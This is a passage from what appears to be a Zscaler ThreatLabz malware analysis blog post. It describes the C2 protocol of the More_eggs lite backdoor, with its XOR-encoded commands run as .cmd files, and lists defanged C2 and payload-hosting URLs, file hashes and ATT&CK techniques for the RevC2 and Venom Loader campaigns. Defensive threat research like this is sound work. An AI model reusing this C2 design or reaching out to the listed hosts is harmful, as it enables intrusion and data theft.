key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run under the
name GoogleUpdate.
THIRD STAGE: MORE_EGGS LITE
More_eggs lite continuously sends HTTP POST requests in an infinite loop
to <c2_address>/api/infos. The POST data is formatted
as name=^%computername%&ret=. The name contains the victim’s computer name and
the first request will have ret as an empty string. The output of the command to
be executed is returned in the next request inside the ret parameter. The figure
below shows the network traffic between a system infected with More_eggs lite
malware and the C2 server.
Figure 7: Network traffic between a system infected with More_eggs lite and the
C2 server.
The response of the request is JSON data in the format {"command":
%command_encoded%}. The command_encoded is XOR’ed with %computername% and
written to the Windows temporary directory as a .cmd file and executed.
CONCLUSION
ThreatLabz observed numerous campaigns utilizing RevC2 and Venom Loader. We
believe these malware families used in these campaigns are early versions, and
expect more features and anti-analysis techniques to be added in the future.
The Zscaler Cloud Sandbox has consistently detected these campaigns and other
malware attacks with high accuracy. ThreatLabz continues to monitor and track
these new malware families to protect our customers.
ZSCALER COVERAGE
Zscaler’s multilayered cloud security platform detects indicators related to
RevC2 and Venom Loader at various levels. The figure below depicts the Zscaler
Cloud Sandbox, showing detection details for the campaign delivering Venom
Loader and More_eggs lite.
Figure 8: Zscaler sandbox report for the campaign delivering Venom Loader
and More_eggs lite.
In addition to sandbox detections, Zscaler’s multilayered cloud security
platform detects indicators related to this campaigns at various levels with the
following threat names:
* LNK.Downloader.VenomLNK
* Win32.Backdoor.RevC2
* Win32.Downloader.VenomLoader
INDICATORS OF COMPROMISE (IOCS)
Type
Indicator
Description
SHA256
9b0b58aa10577244bc0e174d588ffa8d34a54a34c1b59371acba52772b584707
VenomLNK used in the first campaign.
SHA256
46a982ec4ea400f8df403fa8384e1752dca070bd84beef06284f1d412e159e67
VenomLNK used in the first campaign.
SHA256
cf45f68219c4a105fffc212895312ca9dc7f4abe37306d2f3b0f098fb6975ec7
RevC2
SHA256
153cd5a005b553927a94cc7759a8909bd1b351407d8d036a1bf5fcf9ee83192e
RevC2
SHA256
8e16378a59eb692de2c3a53b8a966525b0d36412bfd79c20b48c2ee546f13d04
VenomLNK used in the second campaign.
SHA256
f93134f9b4ee2beb1998d8ea94e3da824e7d71f19dfb3ce566e8e9da65b1d7a2
Venom Loader
URL
hxxp://170.75.168[.]151:8080/transaction.pdf.lnk/
VenomLNK hosting URL.
URL
ws://208.85.17[.]52:8082
C2 of RevC2.
URL
ws://nopsec.org:8082/
C2 of RevC2.
URL
hxxp://65.38.121[.]211/api/infos
C2 of More_Eggs lite.
MITRE ATT&CK TECHNIQUES
ID
Technique Name
Description
T1547.001
Registry Run Keys / Startup Folder
Venom Loader uses autorun key for persistence.
T1140
Deobfuscate/Decode Files or Information
More_eggs lite’s JS content is XOR’ed and base64-encoded.
T1574.002
DLL Side-Loading
Venom Loader is executed by ApplicationFrameHost.exe and goes on to
sideload dxgi.dll.
T1539
Steal Web Session Cookie
RevC2 steals cookies from browsers.
T1555
Credentials from Password Stores
RevC2 steals saved passwords from browsers.
T1113
Screen Capture
RevC2 takes screenshots of the victim’s screen.
T1090
Proxy
RevC2 has a command which proxies traffic.
T1059
Command and Scripting Interpreter
RevC2 and More_eggs lite both have RCE capabilities.
T1571
Non-Standard Port
RevC2 conducts C2 communications through a non-standard port.
T1071.001
Application Layer Protocol: Web Protocols
RevC2 uses WebSocket for C2 communication. More_eggs lite uses HTTP for C2
communication.
T1041
Exfiltration Over C2 Channel
RevC2 and More_eggs lite are capable of exfiltrating stolen information over the
C2 channel.
APPENDIX
Visit our GitHub repository to access the Python script that emulates the
RevC2's WebSocket server.
Thank you for reading
WAS THIS POST USEFUL?
Yes, very!
Not really
EXPLORE MORE ZSCALER BLOGS
European diplomats targeted by APT29 (Cozy Bear) with WINELOADER
Read post
Steal-It Campaign
Read post
Microsoft, Midnight Blizzard, and the Scourge of Identity Attacks
Read post
GET THE LATEST ZSCALER BLOG UPDATES IN YOUR INBOX
*
Subscribe
By submitting the form, you are agreeing to our privacy policy.
THE ZSCALER EXPERIENCE
Learn about:
Your world, securedZero TrustSecure Access Service Edge (SASE)Security Service
Edge (SSE)Zero Trust Network Access (ZTNA)Secure Web Gateway (SWG)Cloud Access
Security Broker (CASB)Cloud Native Application Protection Platform (CNAPP)Data
Security Posture Management (DSPM)
PRODUCTS & SOLUTIONS
Secure Your Users
Secure Your Workloads
Secure Your IoT and OT
Secure Internet Access (ZIA)
Data Protection (CASB/DLP)
Digital Experience (ZDX)
Industry & Market Solutions
Partner Integrations
Zscaler Client Connector
PLATFORM
Zero Trust Exchange Platform
Secure Digital Transformation
Network Transformation
Application Transformation
Security Transformation
RESOURCES
Resource Library
Customer Success Stories
Security Preview
Threat Assessment Tools
ThreatLabz Analytics & Insights
Upcoming Events
Blog
Zscaler Academy
CXO Revolutionaries
Zpedia
Ransomware Protection ROI Calculator
POPULAR LINKS
Pricing & Plans
About Zscaler
Leadership Team
Career Opportunities
Find or Become a Partner
Customer Success Center
Investor Relations
Press Center
News & Announcements
Corporate Responsibility
Compliance
Contact Zscaler
Home
English
FrançaisDeutschItaliano日本Castellano - MexicoCastellano - EspañaPortugues -
Brasil
Zscaler is universally recognized as the leader in zero trust. Leveraging the
largest security cloud on the planet, Zscaler anticipates, secures, and
simplifies the experience of doing business for the world's most established
companies.
English
FrançaisDeutschItaliano日本Castellano - MexicoCastellano - EspañaPortugues -
Brasil
*
Subscribe
Visit us on FacebookLinkedinFollow us on XSubscribe our Youtube Channel
SitemapPrivacyLegalSecurity
© 2024 Zscaler, Inc.
All rights reserved. Zscaler™ and other trademarks listed at
zscaler.com/legal/trademarks are either (i) registered trademarks or service
marks or (ii) trademarks or service marks of Zscaler, Inc. in the United States
and/or other countries. Any other trademarks are the properties of their
respective owners.
Zscaler uses cookies, pixels, and other tools to collect information you provide
to us and to capture and record your interaction with our site. We use this
information to enhance site navigation, personalize content, analyze your use of
our website, and assist in our marketing efforts and customer service. To
deliver the best experience and to assist with our efforts, Zscaler social
media, advertising, analytics, and hosting service providers may have access to
the information that you provide to us. By clicking "Accept All," you consent to
our collection, use, and disclosure of such information and to ourTerms of
Service. For more information about our data processing practices, please see
ourPrivacy Policy.
Manage Cookie Preferences Reject All Accept All